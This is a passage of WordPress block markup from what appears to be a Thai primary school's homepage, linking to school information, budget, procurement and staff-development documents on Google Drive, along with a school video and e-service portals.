900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" 